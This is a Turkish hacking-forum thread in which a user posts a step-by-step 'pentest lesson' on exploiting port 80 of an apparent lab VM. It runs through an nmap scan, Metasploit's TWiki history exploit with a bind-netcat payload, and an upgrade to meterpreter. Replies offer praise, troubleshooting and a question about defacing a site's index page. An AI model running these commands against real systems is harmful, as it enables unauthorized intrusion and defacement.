Pentester Dersi Port 80 Http Hackleme

'Exploitler' forumunda ArslannBey tarafından 12 Temmuz 2017 tarihinde açılan konu

    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    dün pentest dersi mysql hacklemeyi anlatmıştım.

    Bugünde Port 80 HTTP ye saldırıyoruz.Exploit kullanıcaz ardından diğer bazı exploitlerle meterpreter açmaya çalışıcaz. Meterpreter sayesinde komutlarımız genişliycek.



    Saldıracağımız IP adresimiz : 192.168.222.131


    Saldırıyı Yaparken Kullanacağımız Materyaller :

    1 - Nmap

    2 - Metasploit


    Port 80 Apache

    -sS komutu ile Syn taraması yaparak tcp portlarını görüntüledim ve de -sV komutu ile remote servislerin versionlarını görüntüledim.

    Bizim Saldırı Yapacağımız Port Numarası 80 yani HTTP portu.

    [​IMG]

    Evet Görüldüğü Üzere Sistemin 80.Portunda Apache Httpd 2.2.8 ((Ubuntu) DAV/2) mevcut.

    Şimdi Msf Console umuzu açalım e exploitleme işlemine geçelim.

    Kod:
    service postgresql start 

    Kod:
    service mysql start 

    Kod:
    msfconsole 



    Metasploitimize giriş yaptık. Ardından exploitimizin içine use komutuyla giriş yapıyoruz.


    Kod:
    use exploit/unix/webapp/twiki_history


    Kod:
    show options


    yazdığımızda bizden bazı şeyleri doldurmamızı istediğini görüyoruz.

    [​IMG]


    Rhostu girelim.


    Kod:
    set RHOST 192.168.222.131


    Daha sonra payloadda değişim uygulayacağız.

    Kod:
    set payload cmd/unix/bind_netcat


    yazdık.

    Son olarakda

    Kod:
    exploit -j 


    Yazdık ve enterladık.

    [​IMG]


    Görüldüğü Üzere session açıldı şimdi farklı bir exploitle meterpreter'e geçireceğiz.

    kodumuz :

    Kod:
    use post/multi/manage/shell_to_meterpreter


    Evet yazdık farklı bi exp.e geçiş yaptık.

    show options yazıyoruz.

    [​IMG]


    Ve burda bizden SESSION kısmını doldurmamızı istiyor bir önceki hamlemizde twiki history exploitiyle exploit-j komutuyla sistemi exploitlemiştik.şimdi metasploitte o session 1 olarak açıldı yani ilk sessionumuz sessions yazarak öğrenebilirsiniz.
    Şimdi komutumuzu girelim.

    Kod:
    set session 1


    [​IMG]

    Görüldüğü üzre girdik.

    Son hamle olarak

    Kod:
    exploit
    
    yazıyoruz ve enterlıyoruz.


    vee bir session daha açıldı.. tabi bende 3 yazıyor sizde 2 yazması lazım.


    [​IMG]


    Kod:
    sessions -i 3
    yazarak meterpreteri açtım..


    [​IMG]


    Okuyan varsa yazsın :) farklı pentester dersleri gelsinmi. yoksa vuln.assesmenta mı geçeyim






     
    EspersSa, KarlikHan, Sekhmet ve 10 kişi daha bunu beğendi.
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
  1. DraGan Atıldı

    Katılım:
    1 Temmuz 2017
    Mesaj:
    634
    Alınan Beğeniler:
    763

    Özel Mesaj
    Mesela sistemin 80 değilde 67 portu açık ama ona uygun exploit yok, tünelleme yapıp bu engel asilabilirmi?
    Bu arada eline sağlık güzel konu devamını beklerim serinin.
     
    ArslannBey ve ERVAH-I-EZEL bunu beğendi.
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    exploit olmadan yapılabileceğini sanmıyorum.
     
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    sağolasın
     
    DraGan bunu beğendi.
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,286
    Alınan Beğeniler:
    4,011

    Özel Mesaj
    Harika gidiyorsun devrem eline sağlık. :) Bu konularda tecrübeli ve bilgili gibisin o yüzden bence sonuna kadar devam et. ;)
     
    ArslannBey bunu beğendi.
    Katılım:
    26 Mart 2017
    Mesaj:
    321
    Alınan Beğeniler:
    988

    Özel Mesaj
    Eline sağlık güzel anlatım :) Ancak arada kaçırdığın küçük eksikler var onlara dikkat et :)
     
    ERVAH-I-EZEL ve ArslannBey bunu beğendi.
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    inşallah devrem az buçuk geçmişten araştırmam sayesinde bu kadar var
    (ç)alıntı yapmadıgım ıcın birden yazıyorum o yüzden atlayabildiğim noktalar oluyor hemen hemen herseyi yazmaya çalısıyorum o yüzden kafa karışıyor :) olabilir tabii ki sağolun
     
    ERVAH-I-EZEL ve GaziHann bunu beğendi.
    Katılım:
    12 Temmuz 2017
    Mesaj:
    70
    Alınan Beğeniler:
    77

    Özel Mesaj
    Eline sağlık bu kadar bilgili bir er görmek çok iyi :) Gazihann devremin de dediği gibi bir kaç önemli nokta var ama anlatım iyi .
     
    akose bunu beğendi.
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    sağolasın
     
    DayiMumin bunu beğendi.
  2. babayoga Atıldı

    Katılım:
    1 Mart 2017
    Mesaj:
    250
    Alınan Beğeniler:
    162

    Özel Mesaj
    devrem bende the value specified for payload is not valid diyor nabıcam
     
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    payloadı yanlış yazıyor olabilir misin
     
  3. babayoga Atıldı

    Katılım:
    1 Mart 2017
    Mesaj:
    250
    Alınan Beğeniler:
    162

    Özel Mesaj
    HAYIR DEVREM KOPYALAYIP YAPIŞTIRDIM
     
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    valla hiç hatayı almadım bilemiyorum fakat bir şeyi yanlıs yapıyorsun çünkü ben öyle bi hata almadım internettende araştırabilirsin
     
    Katılım:
    18 Ağustos 2016
    Mesaj:
    35
    Alınan Beğeniler:
    3

    Özel Mesaj
    Devrem sana bisekilde ulasmam lazim metasploitle ilgili sorularim var sana nasil ulasabilirim
     
    Katılım:
    31 Mayıs 2017
    Mesaj:
    1,033
    Alınan Beğeniler:
    1,174

    Özel Mesaj
    Ellerine saglik.
     
    Katılım:
    16 Ocak 2017
    Mesaj:
    1,215
    Alınan Beğeniler:
    2,170

    Özel Mesaj
    Burdan sorabilirsin
    sağolasın
     
  4. THE AVENGER Atıldı

    Katılım:
    10 Ocak 2016
    Mesaj:
    2,752
    Alınan Beğeniler:
    12,618
    Meslek:
    GİZLİ

    Özel Mesaj

    Beklenilen sorulardandır oyüzden bu tarz soru sorduğun için tebrik ederim,Devren yerine ben yanıt vereyim..

    80. port http portudur 80 port çoğu sitede açıktır,eğer kapalı olursa site ile kullanıcı bağlantı kuramaz... Büyük şirketlerde genelde defaulttur yani 80 dir ama güvenliğine düşkün bir şirket ise kendine özel olarak portlar açabilir.. 80 port açık gözüken her sisteme dalamazsınız sebebi şudur 80.port için firewall güvenlik için idaeldir firewall gelen bağlantıyo detect ettiği anda sizi ya time out yapar yapa access denied. Umarım anlaşılır olmuştur.
     
    ArslannBey, DraGan ve TuranFedaisi bunu beğendi.
  5. THE AVENGER Atıldı

    Katılım:
    10 Ocak 2016
    Mesaj:
    2,752
    Alınan Beğeniler:
    12,618
    Meslek:
    GİZLİ

    Özel Mesaj
    Ayrıyetten tünelleme demişsin Genellikle oda dediğim gibi firewall ve sitenin güvenlik politikalarına bağlıdır.
     
    ArslannBey, TuranFedaisi ve DraGan bunu beğendi.
    Katılım:
    18 Ağustos 2016
    Mesaj:
    35
    Alınan Beğeniler:
    3

    Özel Mesaj
    Devrem 80 portu open durumundayken exploiti soktuk diyelim sonra index nasil basacaz